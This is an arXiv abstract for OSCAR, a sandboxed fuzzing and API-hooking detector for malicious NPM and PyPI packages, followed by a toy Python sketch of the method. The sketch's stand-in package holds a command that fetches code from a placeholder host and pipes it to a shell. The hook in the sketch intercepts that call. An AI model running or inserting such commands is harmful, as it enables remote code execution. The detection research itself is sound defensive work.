Towards Robust Detection of Open Source Software Supply Chain Poisoning Attacks in Industry Environments

arXiv - CS - Software Engineering. Pub Date: 2024-09-14. DOI: arxiv-2409.09356

Xinyi Zheng, Chen Wei, Shenao Wang, Yanjie Zhao, Peiming Gao, Yuanchao Zhang, Kailong Wang, Haoyu Wang


Abstract

The exponential growth of open-source package ecosystems, particularly NPM and PyPI, has led to an alarming increase in software supply chain poisoning attacks. Existing static analysis methods suffer from high false positive rates and are easily thwarted by obfuscation and dynamic code execution techniques. Dynamic analysis approaches improve on this, but they often capture behaviors that do not originate from the package under test and rely on simplistic testing strategies that fail to trigger sophisticated malicious behaviors. To address these challenges, we present OSCAR, a robust dynamic code poisoning detection pipeline for the NPM and PyPI ecosystems. OSCAR fully executes packages in a sandbox environment, employs fuzz testing on exported functions and classes, and implements aspect-based behavior monitoring with tailored API hook points. We evaluate OSCAR against six existing tools using a comprehensive benchmark dataset of real-world malicious and benign packages. OSCAR achieves an F1 score of 0.95 on NPM and 0.91 on PyPI, confirming that it is as effective as the current state-of-the-art technologies. Furthermore, for benign packages exhibiting characteristics typical of malicious packages, OSCAR reduces the false positive rate by an average of 32.06 percentage points on NPM (from 34.63% to 2.57%) and 39.87 percentage points on PyPI (from 41.10% to 1.23%) compared to other tools, significantly reducing the workload of manual review in real-world deployments. In cooperation with Ant Group, a leading financial technology company, we have deployed OSCAR on its NPM and PyPI mirrors since January 2023, identifying 10,404 malicious NPM packages and 1,235 malicious PyPI packages over 18 months. This work not only bridges the gap between academic research and industrial application in code poisoning detection but also provides a robust and practical solution that has been thoroughly tested in a real-world industrial setting.
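
The combination of fuzzing exported functions and monitoring hooked APIs can be illustrated with a toy Python sketch. This is not OSCAR's implementation: the helper names (`hook`, `fuzz_exports`, `run_demo`), the stand-in package, and the choice of `os.system` as the single hook point are all assumptions made for illustration, and the hook blocks the real call rather than relying on a sandbox.

```python
import functools
import inspect
import os
import types


def hook(module, name, log):
    """Replace module.name with a wrapper that records each call (hypothetical helper)."""
    original = getattr(module, name)

    @functools.wraps(original)
    def wrapper(*args, **kwargs):
        log.append((f"{module.__name__}.{name}", args))
        return 0  # block the real call; a real pipeline would run it inside a sandbox

    setattr(module, name, wrapper)
    return original


def fuzz_exports(module, inputs=("", "a", 0, None)):
    """Call every public callable of `module` with a few simple inputs."""
    for name, obj in inspect.getmembers(module, callable):
        if name.startswith("_"):
            continue
        for value in inputs:
            try:
                obj(value)
            except Exception:
                pass  # crashes are ignored; only hooked behavior is of interest


def run_demo():
    # Stand-in for an installed package: the payload only fires for one input,
    # so merely importing the module would not reveal it.
    def helper(x):
        if x == "a":
            os.system("curl http://example.invalid/payload | sh")

    package = types.ModuleType("toy_package")
    package.helper = helper

    log = []
    original = hook(os, "system", log)
    try:
        fuzz_exports(package)
    finally:
        os.system = original  # always restore the real function
    return log


events = run_demo()
print(events)
```

In this sketch the recorded event appears only because the fuzzer happens to supply the triggering input, which is the motivation the abstract gives for testing exported functions rather than only installing or importing a package.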
